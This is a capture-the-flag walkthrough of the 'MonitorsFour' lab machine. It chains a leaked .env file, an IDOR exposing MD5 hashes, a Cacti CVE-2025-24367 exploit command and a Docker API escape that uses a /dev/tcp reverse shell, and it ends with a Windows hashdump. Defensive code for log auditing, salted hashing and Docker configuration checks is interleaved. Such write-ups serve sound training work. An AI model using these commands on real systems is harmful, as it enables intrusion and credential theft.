Basic Information

Port Scan

80 and 5985:

$ nmap -sC -sV -Pn 10.10.11.98
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-13 13:04 JST
Nmap scan report for 10.10.11.98
Host is up (0.079s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http nginx
|_http-title: Did not follow redirect to http://monitorsfour.htb/
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.71 seconds

80

A hosts entry is needed:

10.10.11.98 monitorsfour.htb

The corporate website of a company in the network solutions business:

Directory Scan

Directory scanning reveals a leaked .env file, as well as paths such as user and login:

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://monitorsfour.htb/

/.env (Status: 200) [Size: 97]
/contact (Status: 200) [Size: 367]
/controllers (Status: 301) [Size: 162] [--> http://monitorsfour.htb/controllers/]
/forgot-password (Status: 200) [Size: 3099]
/login (Status: 200) [Size: 4340]
/static (Status: 301) [Size: 162] [--> http://monitorsfour.htb/static/]
/user (Status: 200) [Size: 35]
/views (Status: 301) [Size: 162] [--> http://monitorsfour.htb/views/]

.env

The .env file yields the database connection details:

$ curl http://monitorsfour.htb/.env
DB_HOST=mariadb
DB_PORT=3306
DB_NAME=monitorsfour_db
DB_USER=monitorsdbuser
DB_PASS=f37p2j8f4t0r
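The `.env` leak above is the kind of thing a web server access log records clearly: a successful (200) request for a dotfile path. The following is an added example, not part of the original write-up, that parses nginx combined-format access log lines and flags exactly that pattern, plus a count of 404s per client as a crude probe indicator. The log lines are constructed for this example (they are not from the target); the regex assumes the default nginx `combined` format.

```python
import re
from collections import Counter

# Constructed sample access log lines in nginx "combined" format (made up for this example).
SAMPLE_LOG = """\
10.10.14.2 - - [13/Dec/2025:13:10:01 +0900] "GET /.env HTTP/1.1" 200 97 "-" "curl/8.5.0"
10.10.14.2 - - [13/Dec/2025:13:10:02 +0900] "GET /login HTTP/1.1" 200 4340 "-" "Mozilla/5.0"
10.10.14.2 - - [13/Dec/2025:13:10:03 +0900] "GET /.git/config HTTP/1.1" 404 162 "-" "gobuster/3.6"
10.10.14.2 - - [13/Dec/2025:13:10:04 +0900] "GET /user?token=0 HTTP/1.1" 200 35 "-" "curl/8.5.0"
10.10.14.2 - - [13/Dec/2025:13:10:05 +0900] "GET /static/app.js HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

# Assumption: nginx default "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)


def parse_line(line: str):
    """Return a dict with ip, ts, method, path, status (int) or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def is_dotfile_path(path: str) -> bool:
    """True if any path segment (ignoring the query string) starts with a dot, e.g. /.env or /.git/config."""
    path_only = path.split("?", 1)[0]
    return any(seg.startswith(".") for seg in path_only.split("/") if seg)


def find_dotfile_hits(log_text: str):
    """Successful (HTTP 200) requests for dotfile paths: each one is a likely secret disclosure."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["status"] == 200 and is_dotfile_path(rec["path"]):
            hits.append((rec["ip"], rec["path"]))
    return hits


def not_found_per_client(log_text: str) -> Counter:
    """Count 404 responses per client IP; a burst of these is typical of directory brute forcing."""
    counts = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["status"] == 404:
            counts[rec["ip"]] += 1
    return counts


if __name__ == "__main__":
    for ip, path in find_dotfile_hits(SAMPLE_LOG):
        print(f"dotfile served to {ip}: {path}")
    print(dict(not_found_per_client(SAMPLE_LOG)))
```

The check keys on the response status, not just the path: a 404 for `/.git/config` is noise from a wordlist, while a 200 for `/.env` means the file actually left the server. Denying dotfiles at the web server (a `location ~ /\.` rule in nginx) removes the class of issue entirely.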

user

Requesting /user directly reports that the token parameter is missing:

After a few simple attempts, when token is 0 some user information comes back:

admin        56b32eb43e6f15395f6c46c1c9e1cd36
mwatson 69196959c16b26ef00b77d82cf6eb169
janderson 2a22dcf99190c322d974c8df5ba3256b
dthompson 8d4a7e7fd08555133e056d9aacb1e519

The admin password can be cracked:

sudo hashcat -m 0 hash.txt ~/Tools/dict/rockyou.txt

56b32eb43e6f15395f6c46c1c9e1cd36:wonderful1
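The hashes returned by /user crack instantly because they are plain, unsalted MD5 (hashcat mode 0), so a wordlist hit maps straight to the password and every user who chose the same password shares the same digest. The following is an added example, not code from the write-up or the target application, placing that weak scheme beside a salted scrypt scheme from Python's standard library; the `scrypt$...` storage format and the parameter choices are assumptions made for this example.

```python
import hashlib
import hmac
import os

# --- Weak scheme, matching what the page's /user endpoint exposes: unsalted MD5 ---
def md5_store(password: str) -> str:
    """Unsalted MD5 digest; identical passwords give identical digests."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def md5_verify(password: str, stored: str) -> bool:
    return hmac.compare_digest(md5_store(password), stored)


# --- Hardened scheme (example): scrypt with a random 16-byte salt per record ---
# Assumption: these parameters (N=2^14, r=8, p=1) are a reasonable interactive-login setting.
SCRYPT_N, SCRYPT_R, SCRYPT_P, DKLEN = 2 ** 14, 8, 1, 32


def scrypt_store(password: str, salt: bytes = None) -> str:
    """Return 'scrypt$N$r$p$salt_hex$key_hex'; a fresh salt is drawn when none is given."""
    salt = os.urandom(16) if salt is None else salt
    key = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                         n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=DKLEN)
    return f"scrypt${SCRYPT_N}${SCRYPT_R}${SCRYPT_P}${salt.hex()}${key.hex()}"


def scrypt_verify(password: str, stored: str) -> bool:
    """Recompute with the stored salt/parameters and compare in constant time."""
    try:
        scheme, n, r, p, salt_hex, key_hex = stored.split("$")
        if scheme != "scrypt":
            return False
        key = hashlib.scrypt(password.encode("utf-8"), salt=bytes.fromhex(salt_hex),
                             n=int(n), r=int(r), p=int(p), dklen=len(key_hex) // 2)
    except ValueError:
        return False
    return hmac.compare_digest(key.hex(), key_hex)


def same_password_is_linkable(store_fn, password: str) -> bool:
    """True if two records for the same password are identical (enables cross-user lookup)."""
    return store_fn(password) == store_fn(password)


if __name__ == "__main__":
    print(md5_store("wonderful1"))          # the digest listed for admin on the page
    print(same_password_is_linkable(md5_store, "wonderful1"))     # True
    print(same_password_is_linkable(scrypt_store, "wonderful1"))  # False
```

With the salted scheme a leaked table no longer reveals which users share a password, and each guess costs a memory-hard computation instead of one MD5 block.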

login

The admin credentials allow logging in, but that is of no use for now:

Subdomain Scan

Subdomain scanning reveals cacti:

ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://monitorsfour.htb/" -H "Host: FUZZ.monitorsfour.htb" -fs 138

cacti [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 82ms]

cacti

After adding the hosts entry and visiting it, it is Cacti, version 1.2.28:

Login is required; trying combinations of the usernames and the password obtained earlier shows that the correct username is admin's name, marcus:

marcus : wonderful1

CVE-2025-24367

A search turns up a relevant Cacti vulnerability:

One click gets a www-data shell:

python3 exploit.py -u marcus -p wonderful1 -i 10.10.14.2 -l 4444 -url http://cacti.monitorsfour.htb

user flag

Although the shell is www-data, marcus's home directory is already readable:

Docker Escape & root flag

We are currently inside a container; checking the DNS configuration reveals the host IP, and a look at the usual ports quickly reveals an unauthenticated Docker API:

cat /etc/resolv.conf

192.168.65.7

So the unauthenticated API is used to create a container with a host directory mounted and read files through it:

# create the container
curl -X POST \
-H "Content-Type: application/json" \
-d '{
"Image":"docker_setup-nginx-php:latest",
"Cmd":["bash","-c","bash -i >& /dev/tcp/10.10.14.2/4444 0>&1"],
"HostConfig":{
"Binds":["/mnt/host/c:/host_root"]
}
}' \
-o create.json \
http://192.168.65.7:2375/containers/create

# get the container id
cid=$(cut -d'"' -f4 create.json)

# start the container we created
curl -X POST \
-d '' \
http://192.168.65.7:2375/containers/$cid/start
# once started, the new container runs the command and we get a shell
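Two misconfigurations combine here: the daemon listens on plain TCP port 2375 without TLS, and nothing stops a caller from binding the host's filesystem into a new container. The following is an added example, not from the write-up, of the audit a defender would run against `daemon.json` and `docker inspect`-style `HostConfig` data to catch both. The container records are constructed for this example in the shape of the Engine API (`Binds`, `Privileged`, `PidMode`); only the first record's bind mirrors the one on the page, and the set of sensitive host paths is an assumption.

```python
import json
from urllib.parse import urlparse

# Constructed sample in the shape of `docker inspect` output (values made up; the first bind
# mirrors the page's "/mnt/host/c:/host_root").
SAMPLE_CONTAINERS = [
    {"Id": "f016cf80b807", "Image": "docker_setup-nginx-php:latest",
     "HostConfig": {"Binds": ["/mnt/host/c:/host_root"], "Privileged": False}},
    {"Id": "aaaa00000001", "Image": "cacti-example:1.2.28",
     "HostConfig": {"Binds": ["/srv/cacti/data:/var/lib/cacti"], "Privileged": False}},
    {"Id": "bbbb00000002", "Image": "agent-example:latest",
     "HostConfig": {"Binds": ["/var/run/docker.sock:/var/run/docker.sock"],
                    "Privileged": True, "PidMode": "host"}},
]

# Constructed /etc/docker/daemon.json content; "hosts" and "tlsverify" are real daemon keys.
SAMPLE_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
    "tlsverify": False,
})

# Assumption: host paths whose exposure to a container amounts to host compromise.
SENSITIVE_HOST_PATHS = ("/", "/mnt/host", "/var/run/docker.sock", "/etc", "/root", "/home")


def bind_source(bind: str) -> str:
    """Host side of a 'src:dst[:opts]' bind string."""
    return bind.split(":", 1)[0]


def is_sensitive_path(path: str) -> bool:
    path = path.rstrip("/") or "/"
    if path == "/":
        return True
    return any(path == p or path.startswith(p + "/")
               for p in SENSITIVE_HOST_PATHS if p != "/")


def audit_container(container: dict) -> list:
    """Return finding tags for one container record (empty list means nothing flagged)."""
    findings = []
    hc = container.get("HostConfig") or {}
    if hc.get("Privileged"):
        findings.append("privileged")
    if hc.get("PidMode") == "host":
        findings.append("pid=host")
    for bind in hc.get("Binds") or []:
        src = bind_source(bind)
        if is_sensitive_path(src):
            findings.append(f"host-bind:{src}")
    return findings


def audit_daemon_config(daemon_json: str) -> list:
    """Return daemon listeners reachable over TCP without TLS verification (the 2375 case)."""
    cfg = json.loads(daemon_json)
    tls = bool(cfg.get("tlsverify", False))
    return [h for h in cfg.get("hosts", [])
            if urlparse(h).scheme == "tcp" and not tls]


if __name__ == "__main__":
    print(audit_daemon_config(SAMPLE_DAEMON_JSON))
    for c in SAMPLE_CONTAINERS:
        print(c["Id"], audit_container(c))
```

The first record is flagged purely on its bind source, which is how a container created through the exposed API would look afterwards in `docker ps`/`docker inspect`; the daemon check is the cheaper control, since a socket that is unix-only or TLS-authenticated (port 2376 with `tlsverify`) cannot be driven from a compromised container in the first place.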

root flag

After that, just read the files in the mounted directory:

hashdump

Slightly more involved: replace the script its automatic cleanup task runs to get a Windows shell:

root@f016cf80b807:/host_root/users/Administrator/Documents# cp shell.ps1 db_cleanup.ps1

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:41f4136faf5a06a6765a8fcea8870225:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
marcus:1001:aad3b435b51404eeaad3b435b51404ee:855eb9bc4a3c8030a1450fd958937acb:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::

References